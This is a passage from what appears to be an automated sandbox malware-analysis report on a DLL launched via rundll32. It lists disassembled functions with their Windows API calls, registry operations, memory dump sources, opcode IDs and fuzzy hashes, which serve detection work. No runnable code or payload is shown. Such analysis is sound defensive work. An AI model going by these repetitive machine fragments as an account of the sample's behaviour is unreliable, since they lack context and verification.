                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd_noexit
                                                                                                                          • String ID: V&'
                                                                                                                          • API String ID: 1067611704-802299783
                                                                                                                          • Opcode ID: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                          • Instruction ID: 55a26fe1f49629ebb029cc0f5307a0876855c5a2f29d8e6ee061ec31c14b4724
                                                                                                                          • Opcode Fuzzy Hash: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                          • Instruction Fuzzy Hash: 28112376505205EFDB02EFA4DC8288FBBE8FF08366F210429F501DA061EB31A910CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10001390 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10016C9F: _memset.LIBCMT ref: 10016CB6
                                                                                                                          • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013DA
                                                                                                                          • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013EC
                                                                                                                          • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013FE
                                                                                                                          • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001410
                                                                                                                          • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001422
                                                                                                                          • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001446
                                                                                                                          • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001458
                                                                                                                            • Part of subcall function 100136C0: LoadIconA.USER32 ref: 100136D2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ProcessorVirtual$Concurrency::RootRoot::$IconLoad_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2004563703-0
                                                                                                                          • Opcode ID: 6dfda32c90deb5612abc77854e0b58487ec939f19a89b76ccee82452222fe2ce
                                                                                                                          • Instruction ID: cb42d3b07606be4c321c66a21cc03232491b7df8b22d3b1298026f5f2f4788d5
                                                                                                                          • Opcode Fuzzy Hash: 6dfda32c90deb5612abc77854e0b58487ec939f19a89b76ccee82452222fe2ce
                                                                                                                          • Instruction Fuzzy Hash: 1A216DB4904299EBDB04CBA8C951BAEBB75FF05704F148558E4516B3C2CB79AA00CB65
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10017632 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10017660
                                                                                                                          • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10017683
                                                                                                                          • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1001769F
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 100176AF
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 100176B9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreate$Open
                                                                                                                          • String ID: software
                                                                                                                          • API String ID: 1740278721-2010147023
                                                                                                                          • Opcode ID: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                          • Instruction ID: 0cbbb75e8a23424455f11a5bf93a60ebfd6ed3f7897ef2d174d7de764d8d358b
                                                                                                                          • Opcode Fuzzy Hash: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                          • Instruction Fuzzy Hash: E911C576900169FBDB21DB9ACD88CDFBFBCEF8A740B1040AAE504E2121D3719A55DB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10001180 Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ~_Task_impl.LIBCPMT ref: 100011B6
                                                                                                                            • Part of subcall function 10018A6F: __EH_prolog3.LIBCMT ref: 10018A76
                                                                                                                          • ~_Task_impl.LIBCPMT ref: 100011C8
                                                                                                                          • ~_Task_impl.LIBCPMT ref: 100011EC
                                                                                                                            • Part of subcall function 10018AC4: __EH_prolog3.LIBCMT ref: 10018ACB
                                                                                                                          • ~_Task_impl.LIBCPMT ref: 100011FE
                                                                                                                          • ~_Task_impl.LIBCPMT ref: 10001210
                                                                                                                          • ~_Task_impl.LIBCPMT ref: 10001222
                                                                                                                          • ~_Task_impl.LIBCPMT ref: 10001231
                                                                                                                            • Part of subcall function 10018662: __EH_prolog3.LIBCMT ref: 10018669
                                                                                                                            • Part of subcall function 10016C14: __EH_prolog3.LIBCMT ref: 10016C1B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Task_impl$H_prolog3
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1204490572-0
                                                                                                                          • Opcode ID: 10d967965786d9dd3e33bfeddf35d30d57af0e4a65215ad2dc6e6a32aea05cb1
                                                                                                                          • Instruction ID: 6e4cb6b4a122521f521244997ac3fe4936e5f385243ec76687bf906466ac38b5
                                                                                                                          • Opcode Fuzzy Hash: 10d967965786d9dd3e33bfeddf35d30d57af0e4a65215ad2dc6e6a32aea05cb1
                                                                                                                          • Instruction Fuzzy Hash: 6B215970905189DBEF09DB98C860BBEBB75EF01308F18469DE0526B3C2CB392B00C716
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10020A8E Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 10020A95
                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 10020A9F
                                                                                                                            • Part of subcall function 10033135: RaiseException.KERNEL32(?,?,?,?), ref: 10033175
                                                                                                                          • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004), ref: 10020AB6
                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                            • Part of subcall function 100201BD: __CxxThrowException@8.LIBCMT ref: 100201D1
                                                                                                                          • _memset.LIBCMT ref: 10020AE2
                                                                                                                          • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 356813703-0
                                                                                                                          • Opcode ID: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                          • Instruction ID: 3e12b38782b34356c97e10a87625d487b7a933956f885299f771b8ffc362d3ba
                                                                                                                          • Opcode Fuzzy Hash: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                          • Instruction Fuzzy Hash: 7B117974100305AFE721EF60CD86D2ABBA6EF44314B51C029F8569A622DB30FC60CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10020EEA Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Color$Brush
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2798902688-0
                                                                                                                          • Opcode ID: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
                                                                                                                          • Instruction ID: b96cbce945517a62156269669ca61c0ebe7744eb3e98ebe12a1aee9bfd1db884
                                                                                                                          • Opcode Fuzzy Hash: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
                                                                                                                          • Instruction Fuzzy Hash: 65F012719407449BD730BF728D49B47BAD5FFC4710F02092EE2418B990E6B6E040DF44
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1002981B Relevance: 9.4, APIs: 6, Instructions: 404COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                          • VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                            • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                          • VariantClear.OLEAUT32(?), ref: 10029AAB
                                                                                                                          • VariantClear.OLEAUT32(?), ref: 10029B1D
                                                                                                                          • VariantClear.OLEAUT32(?), ref: 10029D0E
                                                                                                                            • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                            • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                            • Part of subcall function 1002C06F: __EH_prolog3.LIBCMT ref: 1002C079
                                                                                                                            • Part of subcall function 1002C06F: lstrlenA.KERNEL32(?,00000224,10029CDA,?,00000008,00000000,?,000000CC), ref: 1002C098
                                                                                                                            • Part of subcall function 1002C06F: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 1002C0A0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Variant$Clear$H_prolog3$AllocAllocatorByteCopyDebugException@8HeapStringThrowlstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 63617653-0
                                                                                                                          • Opcode ID: 5e2e0a19dc0039e2f502762359befe2295f094a54db6864ce8f61926c363e3fd
                                                                                                                          • Instruction ID: 8f7f5911e4d3fd52506e0ebb541b856e7b36a578254e0be009e80c36fe1d785e
                                                                                                                          • Opcode Fuzzy Hash: 5e2e0a19dc0039e2f502762359befe2295f094a54db6864ce8f61926c363e3fd
                                                                                                                          • Instruction Fuzzy Hash: 13F16D7890024CEBDF55DFA0E890AFD7BB9EF08384F90405AFC5593191DB74AA88DB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1002D1E9 Relevance: 9.3, APIs: 6, Instructions: 253stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 1002D1F0
                                                                                                                          • lstrlenA.KERNEL32(00000000,000000FF,00000050,10022221,00000000,00000001,?,?,000000FF,?,?,?), ref: 1002D222
                                                                                                                            • Part of subcall function 10017790: _memcpy_s.LIBCMT ref: 100177A0
                                                                                                                          • _memset.LIBCMT ref: 1002D2F2
                                                                                                                          • VariantClear.OLEAUT32(?), ref: 1002D3D1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4021759052-0
                                                                                                                          • Opcode ID: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                          • Instruction ID: 5c01f4bcc98ccee0a604cdfa5feeb0fdece88e80b40f5b50a3c571396f452454
                                                                                                                          • Opcode Fuzzy Hash: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                          • Instruction Fuzzy Hash: 50A18C35C04249DBCF11EFA4E985AEEBBF0FF04350FA0415AE914AB291D734AE41DB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1002D5D0 Relevance: 9.1, APIs: 6, Instructions: 118memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 1002D5FF
                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 1002D650
                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 1002D674
                                                                                                                            • Part of subcall function 100200B9: __EH_prolog3.LIBCMT ref: 100200C0
                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 1002D6CC
                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 1002D6F5
                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 1002D724
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocString$H_prolog3_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 842698744-0
                                                                                                                          • Opcode ID: 508acb920ccba7a207f47e88a798d4189b9ed575a01c86aa1581d938c190cd50
                                                                                                                          • Instruction ID: 4ca028c9b4d427f08f2d669533113988f62624cee2fc7606aac8abf48e723189
                                                                                                                          • Opcode Fuzzy Hash: 508acb920ccba7a207f47e88a798d4189b9ed575a01c86aa1581d938c190cd50
                                                                                                                          • Instruction Fuzzy Hash: E9414A34900304CFDB24EFB8D891AADB7B5EF04314F50852EF9659B2A2DB74A854CF55
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 100169E1 Relevance: 9.1, APIs: 6, Instructions: 115threadwindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10016936: GetParent.USER32(100010EC), ref: 10016989
                                                                                                                            • Part of subcall function 10016936: GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                            • Part of subcall function 10016936: IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                            • Part of subcall function 10016936: EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                          • EnableWindow.USER32(?,00000001), ref: 10016A2E
                                                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 10016A3C
                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 10016A46
                                                                                                                          • SendMessageA.USER32 ref: 10016A5B
                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10016AD8
                                                                                                                          • EnableWindow.USER32(?,00000001), ref: 10016B14
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1877664794-0
                                                                                                                          • Opcode ID: f56e269d1f7720d56fa1c58fd8a6d78852bfdb5100da494152acd8aedeab4fb9
                                                                                                                          • Instruction ID: f13ef48dc5fb0c484cec2fa7b3f992f2dc6d3b1b42596072abe369902371925a
                                                                                                                          • Opcode Fuzzy Hash: f56e269d1f7720d56fa1c58fd8a6d78852bfdb5100da494152acd8aedeab4fb9
                                                                                                                          • Instruction Fuzzy Hash: 3B415B72A00258DBEB20CFA4CC81BDD76A8EF09350F614119E949AB281E770D9848F52
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10016936 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetWindowLongA.USER32(100010EC,000000F0), ref: 10016968
                                                                                                                          • GetParent.USER32(100010EC), ref: 10016976
                                                                                                                          • GetParent.USER32(100010EC), ref: 10016989
                                                                                                                          • GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                          • IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                          • EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 670545878-0
                                                                                                                          • Opcode ID: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                          • Instruction ID: 154aafdfd528b469a8bf80fc48512ff59873e22bfc4d6b8fcadc8b05587993e6
                                                                                                                          • Opcode Fuzzy Hash: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                          • Instruction Fuzzy Hash: D111A57260133697D661DB698E80B1BB6ECDF9EAE1F120115ED00EF254EB70DC808696
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10020559 Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ClientToScreen.USER32(?,?), ref: 10020568
                                                                                                                          • GetDlgCtrlID.USER32 ref: 1002057C
                                                                                                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 1002058A
                                                                                                                          • GetWindowRect.USER32 ref: 1002059C
                                                                                                                          • PtInRect.USER32(?,?,?), ref: 100205AC
                                                                                                                          • GetWindow.USER32(?,00000005), ref: 100205B9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1315500227-0
                                                                                                                          • Opcode ID: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                          • Instruction ID: 9197e044a219b4c4c22350dcb983fe24fb7029e94376554506d026f7e511957d
                                                                                                                          • Opcode Fuzzy Hash: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                          • Instruction Fuzzy Hash: 3B01A235501739EBEB11DF549C48E9F3BADEF4A791F404011FD10D2061E730DA018B99
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1001D992 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: _memset
                                                                                                                          • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                                          • API String ID: 2102423945-4122032997
